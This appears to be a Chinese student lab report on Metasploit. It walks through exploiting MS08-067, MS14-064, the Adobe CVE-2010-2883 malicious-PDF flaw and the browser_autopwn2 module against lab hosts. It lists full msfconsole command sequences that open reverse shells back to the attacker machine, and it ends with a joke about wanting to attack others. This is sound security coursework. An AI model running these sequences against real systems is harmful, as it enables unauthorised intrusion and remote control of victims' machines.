1. 实验内容
1.1 实验要求
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1.1一个主动攻击实践,尽量使用最新的类似漏洞;
1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;
1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
1.4 成功应用任何一个辅助模块。
以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的。
2. 实验过程
2.1 一个主动攻击实践,尽量使用最新的类似漏洞
MS08-067
MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。
msfconsole
search ms08_067
use exploit/windows/smb/ms08_067_netapi
set payload generic/shell_reverse_tcp
set RHOST 192.168.87.133
set LHOST 192.168.87.134
但是这里会报错,Exploit completed,but no session was created. 解决方法放文末了。
2.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞
MS14-064
msfconsole
search ms14_064
use exploit/windows/browser/ms14_064_ole_code_execution
set AllowPowershellPrompt true
set SRVHOST 192.168.87.134
set payload
run
这时他会给你一个攻击网址,如图
在靶机浏览器打开这个网址
这时候攻击成功,使用sessions -i 1
获得了靶机的shell,使用截屏命令截了一个屏也有显示
2.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞
CVE-2010-2883
Adobe Reader在处理CoolType字体文件的sing表时,存在栈溢出漏洞,当打开特制的恶意PDF文件时,可允许任意代码远程执行。
msfconsole
search adobe_cooltype_sing
use exploit/windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.87.134
set LPORT 2402
set FILENAME SBBCC.pdf
run
可以看到生成的pdf文件
在靶机里使用adobe reader打开这个pdf
这时候kali会显示攻击成功,获得shell
2.4 成功应用任何一个辅助模块
Browser Autopwn
Browser Autopwn 是由Metasploit提供的一个辅助模块。当访问一个Web页面时,它允许用户自动地攻击一个入侵主机。Browser Autopwn在攻击之前,会先进行指纹信息操作,这意味着它不会攻击Mozilla Firefox浏览器,而只会攻击系统自带的Internet Explorer7浏览器。
msfconsole
use auxiliary/server/browser_autopwn2
大致过程和任务2是一样的,也是生成一个网站,在靶机登录以后会获得靶机shell
3. 问题及解决方案
任务1里面Exploit completed,but no session was created报错,是因为没有设置target,Metaexploit会使用默认的Exploit Target 0,我的靶机系统是Windows XP SP3,需要设置target为34,就ok了
4.学习感悟
现在做了几次实验发现漏洞确实多,各种姿势获得靶机的shell有点意思,搞得我都想攻击别人了